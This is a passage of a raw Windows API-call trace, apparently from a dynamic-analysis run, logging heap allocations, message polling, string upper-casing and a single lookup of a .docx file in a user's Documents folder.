RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0260.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0260.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0260.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0260.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.144] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0260.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0260.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0260.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0260.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0260.145] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0260.145] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0260.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0260.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0260.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0260.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0260.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0260.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0260.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0260.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0260.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0260.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0260.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0260.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0260.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0260.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0260.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0260.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0260.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0260.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0260.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0260.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0260.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0260.146] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0260.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0260.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0260.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0260.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0260.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0260.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0260.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0260.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0260.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0260.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0260.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0260.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0260.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0260.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0260.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0260.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0260.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0260.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0260.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0260.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0260.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0260.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0260.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0260.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0260.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0260.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0260.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0260.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0260.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.148] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0260.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0260.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0260.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0260.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0260.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0260.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0260.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0260.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.149] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0260.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0260.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0260.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0260.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0260.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0260.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0260.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0260.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0260.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.151] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/46_piKwe1cHySGVu21.docx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3443a920, ftCreationTime.dwHighDateTime=0x1d4fa89, ftLastAccessTime.dwLowDateTime=0xbf6275a0, ftLastAccessTime.dwHighDateTime=0x1d48409, ftLastWriteTime.dwLowDateTime=0xbf6275a0, ftLastWriteTime.dwHighDateTime=0x1d48409, nFileSizeHigh=0x0, nFileSizeLow=0x7a1a, dwReserved0=0xa880047, dwReserved1=0x215e2, cFileName="46_piKwe1cHySGVu21.docx", cAlternateFileName="46_PIK~1.DOC")) returned 0xaa5960 [0260.151] FindClose (in: hFindFile=0xaa5960 | out: hFindFile=0xaa5960) returned 1 [0260.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0260.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.152] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0260.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0260.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0260.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0260.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0260.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0260.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0260.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0260.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0260.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.153] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.153] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0260.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.154] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.154] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0260.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.154] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0260.154] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.154] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.155] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.155] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.155] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0260.155] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.156] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 